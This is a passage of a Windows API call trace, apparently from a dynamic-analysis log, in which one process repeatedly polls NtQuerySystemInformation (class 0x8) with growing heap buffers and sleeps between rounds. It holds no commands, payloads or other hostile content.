RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0259.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0259.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.831] Sleep (dwMilliseconds=0x110) [0259.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0259.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0259.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0259.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0259.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0259.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0259.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0259.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0259.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.847] Sleep (dwMilliseconds=0x110) [0259.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0259.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0259.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0259.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0259.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0259.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0259.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0259.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0259.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.862] Sleep (dwMilliseconds=0x110) [0259.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0259.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0259.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0259.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0259.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0259.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0259.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0259.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0259.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.879] Sleep (dwMilliseconds=0x110) [0259.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0259.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0259.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0259.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0259.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0259.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0259.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.942] Sleep (dwMilliseconds=0x110) [0259.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0259.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0259.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0259.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0259.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0259.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0259.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0259.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0259.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.960] Sleep (dwMilliseconds=0x110) [0259.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0259.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0259.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0259.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0259.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0259.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0259.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0259.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0259.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.970] Sleep (dwMilliseconds=0x110) [0259.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0259.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0259.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0259.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0259.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0259.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0259.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0259.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0259.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.992] Sleep (dwMilliseconds=0x110) [0259.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0259.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0259.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0259.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0260.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0260.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0260.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0260.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0260.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.002] Sleep (dwMilliseconds=0x110) [0260.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0260.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0260.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0260.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0260.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0260.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0260.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0260.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0260.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.021] Sleep (dwMilliseconds=0x110) [0260.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0260.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0260.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0260.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0260.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0260.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0260.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0260.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.036] Sleep (dwMilliseconds=0x110) [0260.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0260.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0260.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0260.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0260.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0260.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0260.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0260.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0260.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.052] Sleep (dwMilliseconds=0x110) [0260.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0260.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0260.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0260.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0260.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0260.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0260.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0260.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0260.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.066] Sleep (dwMilliseconds=0x110) [0260.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0260.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0260.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0260.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0260.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0260.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0260.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0260.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0260.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0260.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0260.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0260.083] Sleep (dwMilliseconds=0x110) [0260.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0260.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0260.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0260.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0260.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0260.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0260.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, 